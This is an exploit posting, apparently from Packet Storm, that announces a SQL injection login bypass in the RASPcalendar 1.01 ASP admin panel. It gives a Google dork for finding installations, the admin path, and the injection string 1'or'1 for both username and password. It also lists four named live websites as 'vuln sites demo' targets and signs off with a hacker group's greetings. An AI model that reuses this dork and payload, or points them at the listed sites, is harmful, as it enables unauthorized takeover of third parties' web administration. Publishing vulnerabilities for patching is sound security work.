RASPcalendar version 1.01 suffers from a remote SQL injection vulnerability that allows for login bypass.
502e9d8d8fcb58ac9cadfc80c36b6710cfc53def0589843d4984ac9d45848c39---------------------------------------------------
RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities
---------------------------------------------------
Author : Hackeri-AL
Date : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link : http://www.rttucson.com/RASPcalendar.zip
Verison : 1.01
Tested On : Windows XP
------------------------------------------------------------
Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
------------------------------------------------------------
Example : http://www.usfim.it/RASPcalendar/
: http://site.com/events
: http://site.com/calendar
: etc...
Go to : http://www.usfim.it/RASPcalendar/admin/
UserName : 1'or'1
PassWord : 1'or'1
Login Success Fully :D
------------------------------------------------------------
Vuln sites demo :
http://www.usfim.it/RASPcalendar/admin
http://www.davemitchellassociates.com/events/admin
http://www.bradandrebecca.com/Calendar/admin
http://www.hlubline.com/pt/calendar/admin
------------------------------------------------------------
Found By Hackeri-AL , UAH-Crew Group 2009-2013
UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~
[~] Legends Of Albania
------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed